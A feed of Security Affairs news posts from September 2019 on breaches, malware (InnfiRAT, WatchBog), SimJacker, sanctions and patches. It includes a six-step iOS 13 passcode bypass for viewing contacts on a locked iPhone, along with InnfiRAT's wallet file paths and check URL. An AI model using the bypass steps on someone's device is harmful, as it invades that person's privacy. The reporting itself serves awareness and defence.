[*] [-] [-] [x] [A+] [a-]  
[l] at 9/15/19 6:45am
Drone attacks have hit two major oil facilities run by the state-owned company Aramco in Saudi Arabia, one of them is the Abqaiq site.

Drone attacks have hit Saudi Arabia’s oil production suffered severe damage following a swarm of explosive drones that hit two major oil facilities run by the state-owned company Aramco in Saudi Arabia.

Online are circulating the images of a huge blaze at Abqaiq, site of Aramco’s largest oil processing plant, the Abqaiq site. A second drone attack hit the Khurais oilfield. Abqaiq is about 60km south-west of Dhahran, while in Khurais, 200km further south-west, there is the second-largest oilfield in the country.

According to the local media, the emergency response of the fire brigade teams allowed to control the fires at both facilities.

Saudi Arabia drone attacks 2 The two facilities are located in Abqaiq and Khurais, Saudi Arabia’s interior ministry said. (Photo: Twitter videograb | @Sumol67)

Iran-backed Houthi rebels in Yemen claimed responsibility for the attacks on the Abqaiq plant, according to a spokesman for the group in Yemen, it had deployed 10 drones in the attacks.

10 explosive drones, claimed by Houthi rebels in Yemen, attacked the world's biggest oil processing plant in Saudi Arabia, disrupting the heart of the kingdom's oil industry pic.twitter.com/dhiLyR5QL4

— Bloomberg TicToc (@tictoc) September 14, 2019

The group is threatening Saudi Arabia of further attacks. The Iran-aligned Houthi rebel movement fights the Yemeni government and a coalition of regional countries led by Saudi Arabia that fights the rebels since 2015, when President Abdrabbuh Mansour Hadi was was kicked out of Sanaa by the Houthis.

“The military spokesman, Yahya Sarea, told al-Masirah TV, which is owned by the Houthi movement and is based in Beirut, that further attacks could be expected in the future.” reported the BBC.

“He said Saturday’s attack was one of the biggest operations the Houthi forces had undertaken inside Saudi Arabia and was carried out in “co-operation with the honourable people inside the kingdom”.”

Secretary of State Mike Pompeo blamed Iran for coordinated the attacks, it added that we are facing an unprecedented attack on the world’s energy supply.

We call on all nations to publicly and unequivocally condemn Iran’s attacks. The United States will work with our partners and allies to ensure that energy markets remain well supplied and Iran is held accountable for its aggression

— Secretary Pompeo (@SecPompeo) September 14, 2019

Officials have attributed the attacks to a specific threat actor:

“At 04:00 (01:00 GMT), the industrial security teams of Aramco started dealing with fires at two of its facilities in Abqaiq and Khurais as a result of… drones ,” the official Saudi Press Agency reported. “The two fires have been controlled.”

The attacks will have a dramatic impact on Saudi Arabia’s oil supply, it could be cut off 50 percent following the incidents.

These latest attacks demonstrate the potential impact of drone attacks against critical infrastructures, at the time is not clear if the Houthis group use weaponized commercial civilian drones or they obtained military support fr o m Iran.

“The Saudi Air Force has been pummelling targets in Yemen for years. Now the Houthis have a capable, if much more limited, ability to strike back. It shows that the era of armed drone operations being restricted to a handful of major nations is now over.” continues the BBC.

Groups like the Houthis and Hezbollah have access to drone technology and could use it is sophisticated operations. Intelligence analysts fear the escalating tensions in the region that could open a world oil crisis.

window._mNHandle = window._mNHandle || {}; window._mNHandle.queue = window._mNHandle.queue || []; medianet_versionId = "3121199"; try { window._mNHandle.queue.push(function () { window._mNDetails.loadTag("762221962", "300x250", "762221962"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – drone attacks, Saudi Arabia)

The post Drone attacks hit two Saudi Arabia Aramco oil plants appeared first on Security Affairs.

[Category: Breaking News, Security, drone attacks, Hacking, information security news, Oil, Pierluigi Paganini, Saudi Arabia, Saudi Aramco, Security Affairs, security enws, Security News]

[*] [+] [-] [x] [A+] [a-]  
[l] at 9/15/19 4:49am
A new round of the weekly newsletter arrived! The best news of the week with Security Affairs

Hi folk, let me inform you that I suspended the newsletter service, anyway I’ll continue to provide you a list of published posts every week through the blog.

Once again thank you!

Experts found Joker Spyware in 24 apps in the Google Play store Toyota Boshoku Corporation lost over $37 Million following BEC attack University, Professional Certification or Direct Experience? WordPress 5.2.3 fixes multiple issues, including some severe XSS flaws Belarusian authorities seized XakFor, one of the largest Russian-speaking hacker sites China-linked APT3 was able to modify stolen NSA cyberweapons Stealth Falcon New Malware Uses Windows BITS Service to Stealthy Exfiltrate Data Stealth Falcons undocumented backdoor uses Windows BITS to exfiltrate data Symantec uncovered the link between China-Linked Thrip and Billbug groups Telegram Privacy Fails Again Wikipedia suffered intermittent outages as a result of a malicious attack DoS attack the caused disruption at US power utility exploited a known flaw Million of Telestar Digital GmbH IoT radio devices can be remotely hacked Police dismantled Europes second-largest counterfeit currency network on the dark web Robert Downey Jrs Instagram account has been hacked Adobe September 2019 Patch Tuesday updates fix 2 code execution flaws in Flash Player Dissecting the 10k Lines of the new TrickBot Dropper Microsoft Patch Tuesday updates for September 2019 fix 2 privilege escalation flaws exploited in attacks NetCAT attack allows hackers to steal sensitive data from Intel CPUs Some models of Comba and D-Link WiFi routers leak admin credentials The Wolcott school district suffered a second ransomware attack in 4 months Iran-linked group Cobalt Dickens hit over 60 universities worldwide LokiBot info stealer involved in a targeted attack on a US Company SAP September 2019 Security Patch Day addresses four Security Notes rated as Hot News SimJacker attack allows hacking any phone with just an SMS Poland to establish Cyberspace Defence Force by 2024 The US Treasury placed sanctions on North Korea linked APT Groups WatchBog cryptomining botnet now uses Pastebin for C2 Expert disclosed passcode bypass bug in iOS 13 a week before its release Hackers stole payment data from Garmin South Africa shopping portal InnfiRAT Trojan steals funds from Bitcoin and Litecoin wallets window._mNHandle = window._mNHandle || {}; window._mNHandle.queue = window._mNHandle.queue || []; medianet_versionId = "3121199"; try { window._mNHandle.queue.push(function () { window._mNDetails.loadTag("762221962", "300x250", "762221962"); }); } catch (error) {}

Pierluigi Paganini

( SecurityAffairs  – Newsletter, hacking)

The post Security Affairs newsletter Round 231 appeared first on Security Affairs.

[Category: Breaking News, Cyber Crime, Deep Web, Hacking, Internet of Things, Malware, information security news, Newsletter, Pierluigi Paganini, Security Affairs, Security News]

[*] [-] [-] [x] [A+] [a-]  
[l] at 9/15/19 3:44am
Researcher discovered an unsecured database exposed online, belonging to car dealership marketing firm Dealer Leads, containing 198 million records.

The researcher Jeremiah Fowler discovered an unsecured database exposed online that belong to car dealership marketing firm Dealer Leads.

The archive containing 198 million records for a total of 413GB of data containing information of potential car buyers, vehicles, loan and finance inquiries, log data with IP addresses of visitors, and more.

“On August 19th I reported a non-password protected database that contained a massive 413GB of data and a total of 198 million records. The most shocking part was that I had seen this dataset several times in the previous weeks, but was unable to identify the owner.” reports Security Discovery. “I spent several days trying to identify the owner of the database and there was no clear indication in the millions of records.”

Dealer Leads provides content relevant and related to the auto industry for franchise and independent car dealerships, the website of the company describes itself with the following statement.

“dominates the automotive digital marketing industry with highly used automobile search strings turned i nto online inventory advertising classified sites, serv ice sit es, finance sites etc. Car shoppers have needs, and DealerLeads matches those needs in live searches.”

The Elastic database was accessible to anyone with any browser, its records included name, email, phone, address, IP, and other sensitive or identifiable information, in plain text.

The archive also included IP addresses, ports, pathways, and storage info.

The good news is that after the expert reported his discovery to the company, it has secured the database restricting public access to the archive.

At the time of writing it is not clear how long the data remained exposed online and if someone had access to its records.

“Dealer Leads acted fast to restrict public access immediately after the notification. Unfortunately, the data was exposed for an undetermined length of time and it is unclear who else may have had access to the millions of records that were publicly exposed.” Security Discovery concludes.

“It is unclear if Dealer Leads has notified individuals, dealerships, or authorities about the data incident. Because of the size and scope of the network applicants and potential customers may not know if their data was exposed,”

window._mNHandle = window._mNHandle || {}; window._mNHandle.queue = window._mNHandle.queue || []; medianet_versionId = "3121199"; try { window._mNHandle.queue.push(function () { window._mNDetails.loadTag("762221962", "300x250", "762221962"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, data leak)

The post Delaler Leads, a car dealer marketing firm exposed 198 Million records online appeared first on Security Affairs.

[Category: Breaking News, Data Breach, data leak, Dealer Leads, hacking news, information security news, Pierluigi Paganini, privacy, Security Affairs, Securuty news]

[*] [-] [-] [x] [A+] [a-]  
[l] at 9/15/19 2:23am
Facebook addressed a vulnerability in Instagram that could have allowed attackers to access private user information.

The security researcher @ZHacker13 discovered a flaw in Instagram that allowed an attacker to access account information, including user phone number and real name.

ZHacker13 discovered the vulnerability in August and reported the issue to Facebook that asked for additional time to address the issue. The social network giant has finally fixed the flaw.

“In putting this article together, I had the security researcher run tests on the platform and he successfully retrieved “secure” user data I know to be real. This data included users’ real names, Instagram account numbers and handles, and full phone numbers.” reads a post published by Forbes. “The linking of this data is all an attacker would need to target those users. It would also enable automated scripts and bots to build user databases that could be searched, linking high-profile or highly-vulnerable users with their contact details.”

The expert also warns that attackers could use automated scripts and bots to collect user data from the platform, linking users with their contact details.

Just a week before ZHacker13 disclosed the bug, phone numbers associated with 419 million accounts of the social  network  giant were exposed online.

It is not clear if the two incidents could have the same root cause.

“I found a high vulnerability on Instagram that can cause a serious data leak,” @ZHacker13 told to Forbes. “The vulnerability is still active—and it looks like Facebook are not very serious about pathing it.” Exploiting this vulnerability would enable an attacker using an army of bots and processors to build a searchable/ attackable database of users, bypassing protections protecting that data.”

The expert explained that he discovered by flaw by using the platform’s contact importer in combo with a brute-force attack on its login form.

The attack scenarios is composed of two steps:

  • The attacker carries out a brute force attack on Instagram’s login form, checking one phone number at a time for those linked to a live Instagram account.
  • The attacker finds the account name and number linked to the phone number by exploiting Instagram’s Sync Contacts feature.

A Facebook spokesman explained that his company modified the contact importer in Instagram to address the flaw .

we have changed the contact importer on Instagram to help prevent potential abuse. We are grateful to the researcher who raised this issue, and to the entire research community for their efforts.” said the spokesman.

Facebook, after initial resistance, confirmed it is evaluating to reward @ZHacker13 for reporting the bug as part of its bug bounty program.

“Facebook had also told @ZHacker13 that although the vulnerability was serious, there was internal awareness of the issue and so it was not eligible for a reward under the bounty scheme.” continues the post. “This would have set a terrible precedent and disincentivized researchers from coming forwards with similar vulnerabilities. I questioned Facebook on its decision, and the company reconsidered and told me it has “reassessed” the discovery of the bug and would reward the researcher after all. “

Facebook pointed out that there is no evidence that any user data has been abused by threat actors.  

window._mNHandle = window._mNHandle || {}; window._mNHandle.queue = window._mNHandle.queue || []; medianet_versionId = "3121199"; try { window._mNHandle.queue.push(function () { window._mNDetails.loadTag("762221962", "300x250", "762221962"); }); } catch (error) {}

Pierluigi Paganini

( SecurityAffairs  – Instagram, hacking)

The post A bug in Instagram exposed user accounts and phone numbers appeared first on Security Affairs.

[Category: Breaking News, Hacking, Facebook, hacking news, information security news, Instagram, Pierluigi Paganini, Security Affairs, Security News]

[*] [-] [-] [x] [A+] [a-]  
[l] at 9/14/19 2:05pm
A security researcher disclosed a passcode bypass just a week before Apple has planned to release the new iOS 13 operating system, on September 19.

Apple users are thrilled for the release of the iOS 13 mobile operating system planned for September 19, but a security expert could mess up the party.

The security researcher Jose Rodriguez discovered a passcode bypass issue that could be exploited by attackers to gain access to iPhones contacts and other information even on locked devices.

Below the step by step procedure to exploit the passcode bypass:

  1. Reply to an incoming call with a custom message.
  2. Enable the VoiceOver feature.
  3. Disable the VoiceOver feature
  4. Add a new contact to the custom message
  5. Click on the contacts image to open options menu and select “Add to existing contact”. 
  6. When the list of contacts appears, tap on the other contact to view its info.

Below the video PoC published by Rodriguez that shows how to see a device’s contact information.

Rodriguez reported the flaw to Apple on July 17th, 2019, at the time the new iOS version was still in beta. The expert disclosed the issue on September 11th and at the time Apple had still not addressed the flaw.

Experts hope that Apple will be able to fix the bug withing September 19th.

Rodriguez discovered many other passcode bypass issues in the past, in October 2018, a few hours after Apple released iOS 12.1 the iPhone bug hunter Jose Rodriguez found a new passcode bypass issue that could have been exploited to see all contacts’ private information on a locked iPhone.

A few weeks before, he discovered another passcode bypass vulnerability in Apple’s iOS version 12 that could have been exploited to access photos, contacts on a locked iPhone XS.

The researcher also disclosed a new passcode bypass flaw that could have been exploited to access photos and contacts on a locked iPhone XS.

window._mNHandle = window._mNHandle || {}; window._mNHandle.queue = window._mNHandle.queue || []; medianet_versionId = "3121199"; try { window._mNHandle.queue.push(function () { window._mNDetails.loadTag("762221962", "300x250", "762221962"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – iOS 13, passcode bypass)

The post Expert disclosed passcode bypass bug in iOS 13 a week before its release appeared first on Security Affairs.

[Category: Breaking News, Hacking, Mobile, Apple, information security news, ios 13, Pierluigi Paganini, Security Affairs, Security News]

[*] [+] [-] [x] [A+] [a-]  
[l] at 9/14/19 9:33am
Researchers at Z s caler have spotted a new malware dubbed InnfiRAT that infects victims’ systems to steal cryptocurrency wallet data. 

Researchers at Z s caler have discovered a new Trojan dubbed InnfiRAT that implements many standard Trojan capabilities along with the ability to steal cryptocurrency wallet data. 

“As with just about every piece of malware, InnfiRAT is designed to access and steal personal information on a user’s computer.” states a blog post published by Zscaler. “Among other things, InnfiRAT is written to look for cryptocurrency wallet information, such as Bitcoin and Litecoin. InnfiRAT also grabs browser cookies to steal stored usernames and passwords, as well as session data.”

Upon execution, the malware initially checks whether the file is executing from %AppData% directory or not with the name NvidiaDriver.exe. The malware then checks for network connectivity by making a request to “ iplogger [ . ] com /1HEt47,” and records all the running processes in an array to check whether any of them is running with the name NvidiaDriver.exe. If it finds one of the processes running with this name, it kills that process and waits for an exit.

The malicious code will make a copy of itself in the AppData directory before writing a Base64 encoded PE file in memory to execute the main component of the Trojan. 

As the execution of the malware starts, it checks for the presence of virtualized environment that could be used by researchers to analyze the threat. If the malware is not running in a sandbox it will contact the command-and-control (C2) server, transfer the information stolen form the machine, and await further commands.

The InnfiRAT Trojan can also deploy additional payloads to steal files, capture browser cookies to harvest stored credentials for various online services and grab open sessions. The malware is also able to shut down traditional antivirus processes.

InnfiRAT scans the machine for files associated with Bitcoin (BTC) and Litecoin (LTC) wallets (Litecoin: %AppData%\Litecoin\wallet.dat,
Bitcoin : %AppData%\Bitcoin\wallet.dat), if they are present, the malicious code siphons existing data in the attempt of stealing the victims’ funds.

Bitcoin

“Because RATs are usually downloaded as a result of a user opening an email attachment or downloading an application that has been infected, the first line of defense is often the users who must, as always, refrain from downloading programs or opening attachments that aren’t from a trusted source.” concludes the researchers.

window._mNHandle = window._mNHandle || {}; window._mNHandle.queue = window._mNHandle.queue || []; medianet_versionId = "3121199"; try { window._mNHandle.queue.push(function () { window._mNDetails.loadTag("762221962", "300x250", "762221962"); }); } catch (error) {}

Pierluigi Paganini

( SecurityAffairs  – InnfiRAT, hacking)

The post InnfiRAT Trojan steals funds from Bitcoin and Litecoin wallets appeared first on Security Affairs.

[Category: Breaking News, Malware, Bitcoin, Hacking, information security news, InnfiRAT, malware, Pierluigi Paganini, Security Affairs, Security News]

[*] [-] [-] [x] [A+] [a-]  
[l] at 9/14/19 6:50am
Garmin, the multinational company focused on GPS technology for automotive, aviation, marine, outdoor, and sport activities is victim of a data breach.

Garmin is the victim of a data breach, it is warning customers in South Africa that shopped on the shop.garmin.co.za portal that their personal info and payment data were exposed.

Garmin data breach

The stolen data, included customers’ home addresses, phone numbers, emails, and credit card information that could be used to make purchases (i.e. Card number, expiration date and CVV code for your payment card ) .

“We recently discovered theft of customer data from orders placed through shop.garmin.co.za (operated by Garmin South Africa) that compromised your personal data related to an order that you placed through the website,” said Jennifer Van Niekerk, South Africa Managing Director.

“The compromised data was limited to only Garmin’s South Africa site, and contained payment information, including the number, expiration date and CVV code for your payment card, along with your first and last name, physical address, phone number and email address.”

Garmin SA recommends customers to review and monitor all their payment card records for any purchases, it seems that the company is not offering to the impacted customers any fraud protection service.

Impacted customers have to contact their bank or payment card provider.

The breached shopping portal was using the popular Magento ecommerce platform, it was shut down after the security breach was discovered.

The Register contacted Garmin South Africa to receive more info on the incident, the company confirmed that the attackers used a software skimmer to siphon customers payment details.

Garmin explained that the e-commerce site “was operated by a third party on behalf of Garmin South Africa.”

“Promptly after learning of this incident, we immediately shut down the impacted system, began an investigation, and contacted the South African Information Regulator.” Garmin told to ElReg.

“While Garmin does not store credit card information, the unauthorized party leveraged virtual skimming technology to capture customer details at the time of input, including credit card information.” It added that the incident was isolated to a few thousand customers who accessed the SA portal: “This incident affected less than 6,700 customers in South Africa and does not affect customers who purchased from other Garmin websites in other regions.”

When dealing with such kind of attacks, most of them were carried out by an umbrella of hacking crews that are tracked as Magecart, but at the time their involvement was not demonstrated by any security firm.

window._mNHandle = window._mNHandle || {}; window._mNHandle.queue = window._mNHandle.queue || []; medianet_versionId = "3121199"; try { window._mNHandle.queue.push(function () { window._mNDetails.loadTag("762221962", "300x250", "762221962"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – data breach, hacking)

The post Hackers stole payment data from Garmin South Africa shopping portal appeared first on Security Affairs.

[Category: Breaking News, Data Breach, Hacking, data breach, Garmin, Pierluigi Paganini, Security Affairs, Security News]

[*] [-] [-] [x] [A+] [a-]  
[l] at 9/13/19 2:21pm
The US Treasury placed sanctions on three North Korea-linked hacking groups, the Lazarus Group, Bluenoroff, and Andarial.

The US Treasury sanctions on three North Korea-linked hacking groups, the Lazarus Group, Bluenoroff, and Andarial.

The groups are behind several hacking operations that resulted in the theft of hundreds of millions of dollars from financial institutions and cryptocurrency exchanges worldwide and destructive cyber-attacks on infrastructure. Lazarus Group is also considered the threat actors behind the 2018 massive WannaCry attack.

According to the Treasury, the three groups “likely” stole $571 million in cryptocurrency from five Asian exchanges in 2017 and 2018.

Intelligence analysts believe the groups are under the control of the Reconnaissance General Bureau, which is North Korea’s primary intelligence bureau.

“Treasury is taking action against North Korean hacking groups that have been perpetrating cyber attacks to support illicit weapon and missile programs,” said Sigal Mandelker, Treasury Under Secretary for Terrorism and Financial Intelligence.

“We will continue to enforce existing US and UN sanctions against North Korea and work with the international community to improve cybersecurity of financial networks.”

The activity of the Lazarus Group surged in 2014 and 2015, its members used mostly custom-tailored malware in their attacks and experts that investigated on the crew consider it highly sophisticated.

This threat actor has been active since at least 2009, possibly as early as 2007, and it was involved in both cyber espionage campaigns and sabotage activities aimed to destroy data and disrupt systems.

The group is considered responsible for the massive WannaCry ransomware attack, a string of SWIFTattacks in 2016, and the Sony Pictures hack.

Bluenoroff is considered a sub-group of the Lazarus APT that was formed by the North Korean government to earn revenue from hacking campaigns in response to increased global sanctions.  

“According to industry and press reporting, by 2018, Bluenoroff had attempted to steal over $1.1 billion dollars from financial institutions and, according to press reports, had successfully carried out such operations against banks in Bangladesh, India, Mexico, Pakistan, Philippines, South Korea, Taiwan, Turkey, Chile, and Vietnam.” continues the US Treasury.

Andariel , is another Lazarus subgroup that focuses in targeting businesses, government agencies, and individuals. In conducted multiple attacks aimed at stealing bank card information and on ATMs.

Andariel carried out cyber attacks against online gambling and poker sites.

The sanctions placed by the US Treasury aim to lock the access to the global financial system and to freeze any assets held under US jurisdiction.

“As a result of today’s action, all property and interests in property of these entities, and of any entities that are owned, directly or indirectly, 50 percent or more by the designated entities, that are in the United States or in the possession or control of U.S. persons are blocked and must be reported to OFAC.” states the US Treasury. “OFAC’s regulations generally prohibit all dealings by U.S. persons or within (or transiting) the United States that involve any property or interests in property of blocked or designated persons. “

window._mNHandle = window._mNHandle || {}; window._mNHandle.queue = window._mNHandle.queue || []; medianet_versionId = "3121199"; try { window._mNHandle.queue.push(function () { window._mNDetails.loadTag("762221962", "300x250", "762221962"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – North Korea, hacking)

The post The US Treasury placed sanctions on North Korea linked APT Groups appeared first on Security Affairs.

[Category: APT, Breaking News, Hacking, Laws and regulations, hacking news, information security news, malware, North Korea, Pierluigi Paganini, Security Affairs, Security News]

[*] [+] [-] [x] [A+] [a-]  
[l] at 9/13/19 12:04pm
A new cryptocurrency-mining botnet tracked as WatchBog is heavily using the Pastebin service for command and control (C&C) operations.

Cisco Talos researchers discovered a new cryptocurrency -mining botnet tracked as WatchBog is heavily using the Pastebin service for command and control.

The WatchBog bot is a Linux-based malware that is active since last year, it targets systems to mine for the Monero virtual currency.

“Cisco Incident Response (CSIRS) recently responded to an incident involving the Watchbog  cryptomining   botnet . The attackers were able to exploit CVE-2018-1000861 to gain a foothold and install the Watchbog malware on the affected systems.” states the analysis published by Cisco Talos.

“This Linux-based malware relied heavily on Pastebin for command and control (C2) and operated openly. CSIRS gained an accurate understanding of the attacker’s intentions and abilities on a customer’s network by analyzing the various Pastebins.”

Recently, experts at Intezer researchers have spotted a strain of the Linux mining that also scans the Internet for Windows RDP servers vulnerable to the Bluekeep.

WatchBog

The new WatchBog variant includes a new spreader module along with exploits for the following recently patched vulnerabilities in Linux applications:

The malware also includes scanners for Jira and Solr flaws along with Brute-forcing module for CouchDB and Redis installs.

The operators behind the WatchBog botnet claim to be able to identify vulnerabilities in enterprise systems “before any ‘real’ hackers could do so,” and offer their protection services. However, every time the operators identify vulnerable hosts, the systems are recruited in the crypto-mining botnet ,

“During the investigation, Cisco IR found signs of hosts becoming a part of a separate botnet around the time of the Watchbog activity. This raises serious doubts about the “positive” intentions of this adversary.” continues Talos.

During the installation phase, the bot checks for running processes associated with other cryptocurrency miners, then it will use a script to terminate them.

Then determines whether it can write to various directories, checks the system architecture, and then makes three attempts to download and install a ‘kerberods’ dropper using wget or curl. .

The installation script also retrieves the contents of a Pastebin URL containing a Monero wallet ID and mining information, then it downloads the miner. The script also checks if the ‘ watchbog ‘ process is running, if it is not founb , the ‘ testa ‘ or ‘download’ functions are called to install the version of the miner that match the target architecture.

The ‘ testa ‘ function is used to facilitate the infection process, i s responsible for writing the various configuration data used by the miner.

The script downloads encoded Pastebins as a text file and gives it execution permissions. The script finally s tarts the Watchbog process and deletes the text file.

The ‘download’ function performs similar operations by writing the contents retrieved from various file locations, once determined the target architecture it installs the appropriate miner.

The WatchBog uses SSH for lateral movements, a specific script also checks for the existence of SSH keys into the target systems in the attempt to use it while targeting other systems.

Talos researchers also noticed that threat actors leverage a Python script that scans for open Jenkins and Redis ports on the host’s subnet for lateral movement. Attackers also rely on cron jobs to achieve persistence and attempt to cover their tracks by erasing or overwriting files and logs.

“ Unpatched web applications vulnerable to known CVEs are a major target for attackers. Adversaries can leverage the vulnerability to gain a foothold into the web server and network environment in which the web server is deployed.” concludes the report. “The best way to prevent such activity would be to ensure that all enterprise web applications are up to date,” Talos notes.

window._mNHandle = window._mNHandle || {}; window._mNHandle.queue = window._mNHandle.queue || []; medianet_versionId = "3121199"; try { window._mNHandle.queue.push(function () { window._mNDetails.loadTag("762221962", "300x250", "762221962"); }); } catch (error) {}

Pierluigi Paganini

( SecurityAffairs  – WatchBog, malware)

The post WatchBog cryptomining botnet now uses Pastebin for C2 appeared first on Security Affairs.

[Category: Breaking News, Hacking, Malware, hacking news, information security news, malware, Pierluigi Paganini, Security Affairs, Security News]

[*] [+] [-] [x] [A+] [a-]  
[l] at 9/13/19 12:51am
Poland announced it will launch a cyberspace defense force by 2024 composed of around 2,000 soldiers with a deep knowledge in cybersecurity .

The Polish Defence Ministry Mariusz Blaszczak has approved the creation of a cyberspace defence force by 2024, it will be composed of around 2,000 soldiers with deep expertise in cybersecurity .

The news was reported by AFP, Blaszczak announced that the cyber command unit would start its operations in 2022.

“We’re well aware that in today’s world it’s possible to influence the situation in states by using these methods ( cyberwar ),” Mariusz Blaszczak told to local media at a military cyber training centre in Zegrze.

Poland Cyberspace Defence Force

The defence ministry is already looking for talent with the help of the HackYeah hackathon , it is already offering cash prizes to most skilled hackers. The HackYeah hackathon is one of the most important hacking events in Europe and according to the Polish government, it will attract the many talents and will incentive youngsters in a new profession.

The Ministry also added that Poland would have enough IT graduates by 2024 to provide the force with 2,000 personnel qualified in cyberdefense .

“Poland’s defense ministry is already looking for talent by partnering with the HackYeah hackathon to offer a total of 30,000 zlotys (6,900 euros, $7,650) in cash prizes for top hackers, according to a post the ministry’s website.” states the AFP agency.

window._mNHandle = window._mNHandle || {}; window._mNHandle.queue = window._mNHandle.queue || []; medianet_versionId = "3121199"; try { window._mNHandle.queue.push(function () { window._mNDetails.loadTag("762221962", "300x250", "762221962"); }); } catch (error) {}

Pierluigi Paganini

( SecurityAffairs  – Poland, Cyberspace Defense Force)

The post Poland to establish Cyberspace Defence Force by 2024 appeared first on Security Affairs.

[Category: Breaking News, Cyber warfare, Cyberspace Defence Force, Hacking, hacking news, information security news, military, Pierluigi Paganini, Poland, Security Affairs, Security News]

[*] [-] [-] [x] [A+] [a-]  
[l] at 9/12/19 4:03pm
SimJacker is a critical vulnerability in SIM cards that could be exploited by remote attackers to compromise any phones just by sending an SMS.

Cybersecurity researchers at AdaptiveMobile Security disclosed a critical vulnerability in SIM cards dubbed SimJacker that could be exploited by remote attackers to compromise targeted mobile phones and spy on victims just by sending an SMS.

The SimJacker vulnerability resides in the S@T (SIMalliance Toolbox) Browser dynamic SIM toolkit that is embedded in most SIM cards used by mobile operators in at least 30 countries. The experts discovered that that the exploitation of the vulnerability is independent of the model of phone used by the victim.

The scary part of the story is that a private surveillance firm was aware of the zero-day flaw since at least two years and is actively exploiting the SimJacker vulnerability to spy on mobile users in several countries.

AdaptiveMobile Security have uncovered a new and previously undetected vulnerability and associated exploits, called Simjacker. This vulnerability is currently being actively exploited by a specific private company that works with governments to monitor individuals.” states a post published by AdaptiveMobile.

The S@T Browser application is installed on multiple SIM cards, including eSIM , as part of SIM Tool Kit (STK), it enables the SIM card to initiate actions which can be used for various value-added services.

Since S@T Browser implements a series of STK instructions (i.e. send , call, launch browser, provide local data, run command, and send data) that can be executed by sending an SMS to the phone.

The Simjacker attack involves an SMS containing commands that instruct the SIM Card in the phone to ‘take over’ the phone.

The attacker could exploit the flaw to

  • Retrieve targeted device’ location and IMEI information,
  • Spread mis-information by sending fake messages on behalf of victims,
  • Perform premium-rate scams by dialing premium-rate numbers,
  • Spy on victims’ surroundings by instructing the device to call the attacker’s phone number,
  • Spread malware by forcing victim’s phone browser to open a malicious web page,
  • Perform denial of service attacks by disabling the SIM card, and
  • Retrieve other information like language, radio type, battery level, etc.

The experts explained that the attack is transparent for the users, the targets are not able to notice any anomaly.

“The main Simjacker attack involves an SMS containing a specific type of spyware-like code being sent to a mobile phone, which then instructs the SIM Card within the phone to ‘take over’ the mobile phone to retrieve and perform sensitive commands.” continues the post.

“During the attack, the user is completely unaware that they received the attack, that information was retrieved, and that it was successfully exfiltrated ,”

The experts revealed that they observed SimJacker attacks against users with most popular mobile devices manufactured by Apple, Google, Huawei, Motorola, and Samsung.

According to the researchers, almost any mobile phone model is vulnerable to the SimJacker attack because it leverages a component on SIM cards and its specifications are the same since 2009.

“The Simjacker vulnerability could extend to over 1 billion mobile phone users globally, potentially impacting countries in the Americas, West Africa, Europe, Middle East and indeed any region of the world where this SIM card technology is in use.” states the post.

The researchers plan to disclose technical details of the attack at the VB2019 London conference, in October 2019.

“ Simjacker represents a clear danger to the mobile operators and subscribers. This is potentially the most sophisticated attack ever seen over core mobile networks,” said Cathal McDaid, CTO, AdaptiveMobile Security in a press release. Simjacker worked so well and was being successfully exploited for years because it took advantage of a combination of complex interfaces and obscure technologies, showing that mobile operators cannot rely on standard established defences . Now that this vulnerability has been revealed, we fully expect the exploit authors and other malicious actors will try to evolve these attacks into other areas”.

“It’s a major wake-up call that shows hostile actors are investing heavily in increasingly complex and creative ways to undermine network security. This compromises the security and trust of customers, mobile operators, and impacts the national security of entire countries.”

Security experts believe that the public disclosure of the SimJacker attack could allow threat actors to use it in operations and there is the concrete risk that that can also evolve this technique.

The experts reported their discovery to the GSM Association and the SIM alliance, the latter published a list recommendations for SIM card manufacturers. The SIMalliance recommends implementing security for S@T push messages.

Mobile operators can also mitigate the attack by analyzing and blocking suspicious messages that contain S@T Browser commands.

window._mNHandle = window._mNHandle || {}; window._mNHandle.queue = window._mNHandle.queue || []; medianet_versionId = "3121199"; try { window._mNHandle.queue.push(function () { window._mNDetails.loadTag("762221962", "300x250", "762221962"); }); } catch (error) {}

Pierluigi Paganini

( SecurityAffairs  – SimJacker, hacking)

The post SimJacker attack allows hacking any phone with just an SMS appeared first on Security Affairs.

[Category: Breaking News, Hacking, Mobile, hacking news, information security news, Pierluigi Paganini, Security Affairs, Security News, simjacker, spyware]

[*] [-] [-] [x] [A+] [a-]  
[l] at 9/12/19 8:12am
SAP released the September 2019 Security Patch that addressed four Security Notes rated as Hot News by the company.

SAP released the September 2019 Security Patch that addressed four Security Notes rated as Hot News by the company, but only one of them is new.

SAP released 16 new or updated Security Notes, the overall number of Security Notes published this month is lower than in August.

The new Security Note addresses a code injection vulnerability in SAP NetWeaver AS for Java (Web Container). The issue, tracked as CVE-2019-0355, received a CVSS score of 9.1.

The vulnerability affects the SAP default implementation of the HTTP PUT method, an attacker could exploit the flaw to bypass the input validation check.

“SAP NetWeaver Application Server Java Web Container, ENGINEAPI (before versions 7.10, 7.20, 7.30, 7.31, 7.40, 7.50) and SAP-JEECOR (before versions 6.40, 7.0, 7.01), allows an attacker to inject code that can be executed by the application. An attacker could thereby control the behaviour of the application.” reads the security adviso r y.

An attacker could upload dynamic web content and take over the application, possible impacts are the unauthorized execution of commands, the disclosure of sensitive information, trigger a Denial of Service condition.

Two other Hot News notes update patches released in the past, they address an OS command injection vulnerability in SAP Diagnostics Agent (CVE-2019-0330).

“A SolMan admin can abuse the Diagnostic Agent (SMDAgent) bug and gain access to any SAP system connected to the SolMan system.” reads the analysis published security firm Onapsis. “Even though many SolMan admins have admin privileges in other SAP systems, certain scenarios may allow an escalation of privileges to those who don’t,”.

The last Hot News note released in September 2019 Security Patch updates a patch released in April 2018 and addresses security issued that affect the browser control Google Chromium delivered with SAP Business Client.

SAP also released a set of security patches after the second Tuesday of last month and before the second Tuesday of this month.

The full list of Security Notes released by SAP is available here:

window._mNHandle = window._mNHandle || {}; window._mNHandle.queue = window._mNHandle.queue || []; medianet_versionId = "3121199"; try { window._mNHandle.queue.push(function () { window._mNDetails.loadTag("762221962", "300x250", "762221962"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – September 2019 Security Patch, security)

The post SAP September 2019 Security Patch Day addresses four Security Notes rated as Hot News appeared first on Security Affairs.

